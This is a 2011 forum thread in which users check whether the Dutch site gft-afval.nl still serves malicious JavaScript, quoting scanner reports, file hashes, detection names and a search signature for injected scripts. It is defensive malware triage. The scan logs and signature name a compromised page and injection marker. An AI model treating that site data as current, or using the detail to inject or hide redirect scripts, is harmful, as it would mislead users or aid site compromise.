Is this site still infected?

polonus · December 11, 2011, 8:46pm

Hi forum friends,

According to urlnetquery site is suspicious: http://urlquery.net/report.php?id=11338
Found this also according to VW: HTML/IFrame.acu RIPE NL ripe-admin at trueserver dot nl 87.233.207.23 to 87.233.207.23 gft-afval dot nl -http://gft-afval.nl/html/home.htm
Scanned here: http://www.virustotal.com/url-scan/report.html?id=04ef060aae2dbb62a1eef6e5321270a7-1323631080 results 2 /16 (12.5%)
VT results for home_start.php: http://www.virustotal.com/file-scan/report.html?id=5a9a7b8512e8270f2f3eef62f23fe4a3513b0bea4eded3546b90b5455cbd7702-1323634685
Sucuri gives an all green and avast should detect JS:Redirector-KD [Trj] or has the website been cleansed? Because an older VT result gives these results: http://www.virustotal.com/file-scan/report.html?id=fdf4fc138d9870eda49c6ba2c75f468b8e253a1aa9854a7fbab4375a8f82dc0b-1323561769
This last VT result has a complete other MD5 hash!

polonus

Donovan · December 11, 2011, 8:54pm

Why does the site just contain an obfuscated frame?

polonus · December 11, 2011, 9:06pm

This part is suspicious:
-gft-afval.nl/html/…/Scripts/AC_RunActiveContent.js suspicious
[suspicious:2] (ipaddr:87.233.207.23) (script) -gft-afval.nl/html/…/Scripts/AC_RunActiveContent.js
status: (referer=-gft-afval.nl/html/start.php)saved 8321 bytes 46c525e5b491bfd94ded94351779553c6892c3fe
info: [decodingLevel=0] found JavaScript
This is the DrWeb URL scan: Checking: -http://gft-afval.nl/html/footer.php
File size: 886 bytes
File MD5: a19a6b0084abfbd13bdad70cf51867ee

-http://gft-afval.nl/html/footer.php - archive HTML

-http://gft-afval.nl/html/footer.php/Script.0 - Ok
-http://gft-afval.nl/html/footer.php/Script.1 - Ok
-http://gft-afval.nl/html/footer.php - Ok

Checking: -http://gft-afval.nl/html/menu.htm
File size: 2634 bytes
File MD5: 7c503a4125a736df934121557b5cac57

-http://gft-afval.nl/html/menu.htm - archive HTML

-http://gft-afval.nl/html/menu.htm/Script.0 - Ok
-http://gft-afval.nl/html/menu.htm/Script.1 - Ok
-http://gft-afval.nl/html/menu.htm/Script.2 - Ok
-http://gft-afval.nl/html/menu.htm - Ok

Checking: -http://gft-afval.nl/html/home_start.php
File size: 3572 bytes
File MD5: e78660175b0e034a789deff6ba2c12c9

-http://gft-afval.nl/html/home_start.php - archive HTML

-http://gft-afval.nl/html/home_start.php/Script.0 - Ok
-http://gft-afval.nl/html/home_start.php/Script.1 - Ok
-http://gft-afval.nl/html/home_start.php/Script.2 - Ok
-http://gft-afval.nl/html/home_start.php - Ok

Checking: -http://gft-afval.nl/html/home.htm
Engine version: 5.0.2.3300
Total virus-finding records: 2925336
File size: 4141 bytes
File MD5: 24f2bf23e4e269ae78e458ffe6beec4e

-http://gft-afval.nl/html/home.htm - archive HTML

-http://gft-afval.nl/html/home.htm/Script.0 - Ok
-http://gft-afval.nl/html/home.htm/Script.1 infected with JS.Click.234
And avast detects via Webshield: JS:Redirector-KD[Trj]

polonus

polonus · December 11, 2011, 9:15pm

Hi donovansrb,

Good find, my friend, the answer to your question has been given here as “more thimbthumb.php infections”, read: http://wewatchyourwebsite.com/wordpress/tag/string-prototype-testharc/
link source author = We Watch Your Website admin.
Or you put a search request in the google search engine for “String.prototype.test=”harC”,

polonus

Donovan · December 11, 2011, 9:45pm

JavaScript that detects Flash Player Version.

http://i795.photobucket.com/albums/yy238/Donovansrb10/GFT-afval_NL-JS_Copyrighted.png

See attached. The red is what could be causing the alert.

Is this site still infected?

Announcements